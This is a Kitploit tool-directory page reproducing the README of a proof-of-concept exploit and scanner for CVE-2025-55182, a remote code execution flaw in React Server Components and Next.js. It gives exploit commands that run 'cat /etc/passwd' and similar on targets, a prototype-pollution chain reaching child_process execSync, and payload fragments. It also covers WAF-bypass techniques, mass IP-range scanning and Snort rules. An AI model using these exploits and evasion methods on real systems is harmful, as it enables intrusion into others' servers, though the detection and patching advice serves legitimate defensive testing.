Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-POC — CVE-2025-55182-POC | Kitploit
ツール/GitHubGitHub/zxz3650/cve-2025-55182-poc
脆弱性分析エクスプロイトIDS/IPS回避ウェブアプリケーション悪用WAFバイパスペネトレーションテストペイロード開発
GitHubzxz3650/cve-2025-55182-poc

CVE-2025-55182-POC

CVE-2025-55182-POC

リポジトリを見る
18ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 POC & 検出

React Server Components (RSC) Unsafe Deserialization 脆弱性エクスプロイトおよび検出ツール集

脆弱性情報

  • CVE-ID: CVE-2025-55182
  • 影響バージョン: React 19.x、Next.js 15.x/16.x(App Router 使用時)
  • 攻撃ベクター: RSC Flight プロトコル逆シリアル化時のプロトタイプ汚染による RCE
  • 危険度: Critical (CVSS 10.0)

📦 構成要素

1. 脆弱な環境(Docker)

  • docker-compose.yml - Next.js 15.0.3 + React 19.0.0-rc
  • vulnerable-app/ - 脆弱な Server Action コード

2. エクスプロイトツール

  • exploit_advanced.py - 複数の攻撃手法をサポート(Basic/Advanced/Chunked/Oversize)

3. 脆弱性スキャナー

  • rsc_vulnerability_checker_multi.py - マルチターゲット脆弱性診断ツール

4. IDS 検知ルール

  • rules_priority_based - Snort 優先度ベースの検知ルールセット

🚀 クイックスタート

1. 脆弱な環境の構築

root@kitploit:~
cd vulnerable-app
docker-compose up -d
# http://localhost:3000 접속 확인

2. 脆弱性診断

root@kitploit:~
# 단일 URL 테스트
python3 rsc_vulnerability_checker_multi.py http://localhost:3000

# 여러 URL 배치 스캔
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

# IP 범위 스캔
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.1-254 -p 3000 --threads 20

# 파일에서 읽기
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o results.csv

3. エクスプロイト実行

root@kitploit:~
# 기본 공격
python3 exploit_advanced.py -u http://localhost:3000 -c "whoami" --basic

# 고급 공격 (프로토타입 체인 + thenable)
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --advanced

# WAF 우회 - Unicode 인코딩
python3 exploit_advanced.py -u http://target.com -c "cat /etc/passwd" --advanced --waf-bypass

# WAF 우회 - Chunked Transfer Encoding
python3 exploit_advanced.py -u http://target.com -c "uname -a" --chunked

# WAF 우회 - Oversize Payload (AWS WAF)
python3 exploit_advanced.py -u http://target.com -c "id" --oversize 65536

# 모든 기법 순차 시도
python3 exploit_advanced.py -u http://target.com -c "whoami" --all -v

4. ネットワーク検知テスト

root@kitploit:~
# 공격 트래픽 캡처
sudo tcpdump -i lo0 -w attack.pcap 'port 3000' &
python3 exploit_advanced.py -u http://localhost:3000 -c "id" --all
sudo pkill tcpdump

# Snort로 분석
snort -c snort.conf -r attack.pcap -A console -k none

エクスプロイト手法の詳細

Basic Mode

直接 RSC Flight ペイロードを送信

root@kitploit:~
# Server Action 직접 호출
POST /?__rsc_action__ HTTP/1.1
Content-Type: text/plain
next-action: <action_id>

["$@1",["$","$L2",null,{...}]]

Advanced Mode

プロトタイプ汚染(Prototype Pollution)を利用した RCE

root@kitploit:~
// 핵심 원리
{
  "then": "$1:__proto__:then",           // Chunk.prototype.then 트리거
  "_response": {                          // fake response 주입
    "_formData": {...},
    "_prefix": ""
  },
  "$1:constructor:constructor": Function  // Function 생성자 접근
}

攻撃チェーン:

  1. __proto__ 汚染で Chunk.prototype.then を設定
  2. _response オブジェクトの注入で FormData を制御
  3. $B ハンドラーが response._formData.get(id) を呼び出し
  4. constructor:constructor チェーンで Function にアクセス
  5. process.mainModule.require('child_process').execSync(cmd) を実行

Chunked Mode

Transfer-Encoding を使用したパターン分散

root@kitploit:~
POST /?__rsc_action__ HTTP/1.1
Transfer-Encoding: chunked

10
["$@1",["$","
15
$L2",null,{"then
...
  • WAF パターンマッチング回避(キーワード分割)
  • 単一バッファでは検査不可

Oversize Mode

AWS WAF サイズ制限の回避

root@kitploit:~
payload = original_payload + "X" * (size - len(original_payload))
# AWS WAF: 처음 8KB만 검사
# 실제 공격 코드를 8KB 이후에 배치

📊 検知ルールの優先順位

P0 Rules(SID 2000xxx)- 即時ブロック

  • process.mainModule.require + child_process + execSync
  • __proto__ + resolved_model + RCE モジュール
  • /etc/passwd、/etc/shadow、.ssh/id_rsa へのアクセス

📋 要件

必須

  • Docker & Docker Compose
  • Python 3.8+
  • requests ライブラリ
    root@kitploit:~
    pip install requests
    

任意(検知テスト用)

  • Snort 2.9+
  • tcpdump

🔍 脆弱性スキャナーの使い方

基本的な使用方法

root@kitploit:~
# 단일 URL
python3 rsc_vulnerability_checker_multi.py http://target.com

# 복수 URL
python3 rsc_vulnerability_checker_multi.py http://site1.com http://site2.com

上級者向けの使用方法

root@kitploit:~
# IP 범위 스캔 (CIDR)
python3 rsc_vulnerability_checker_multi.py -r 192.168.1.0/24 -p 3000

# IP 범위 스캔 (하이픈)
python3 rsc_vulnerability_checker_multi.py -r 10.0.0.1-254 -p 8080 --threads 50

# 파일 입력/출력
python3 rsc_vulnerability_checker_multi.py -f targets.txt -o scan_results.csv

# Verbose 모드
python3 rsc_vulnerability_checker_multi.py http://target.com -v

出力形式

root@kitploit:~
[VULNERABLE] http://target.com:3000 - React 19.0.0-rc, Next.js 15.0.3
[SAFE] http://example.com:3000 - Not vulnerable
[ERROR] http://offline.com:3000 - Connection timeout

🎯 エクスプロイトツールのオプション

攻撃モード

  • --basic: 直接 RSC Flight ペイロードを送信
  • --advanced: プロトタイプチェーン + thenable 手法
  • --chunked: Transfer-Encoding 分割送信
  • --oversize <size>: Oversize ペイロード(デフォルト: 65536 bytes)
  • --all: すべての手法を順次試行

WAF 回避

  • --waf-bypass: Unicode エンコーディング(constructor → \u0063onstructor)
  • --chunked: パターン分散配置
  • --oversize: AWS WAF サイズ制限の回避

その他

  • -v, --verbose: 詳細出力
  • -t, --timeout: リクエストタイムアウト(デフォルト: 10秒)

🛡 防御および検知

アプリケーションレベル

  1. React 19.0.0-rc → 19.0.0(stable)へアップグレード
  2. Next.js 15.0.3 → 15.1.0+ へアップグレード
  3. Server Actions の入力検証を強化
  4. experimental 機能を無効化

ネットワークレベル

  1. Snort ルールを適用(rules_priority_based)
  2. WAF ポリシー:
    • __proto__ キーワードをブロック
    • process.mainModule.require パターンをブロック
    • POST body サイズ制限(< 1MB)
  3. Rate Limiting(Server Action リクエスト制限)

モニタリング

root@kitploit:~
# Snort 실시간 모니터링
snort -c snort.conf -i eth0 -A console

# 로그 파일 분석
snort -c snort.conf -r network.pcap -A fast

本記事は研究・教育・診断検証の目的以外には使用しません。

ツールをダウンロード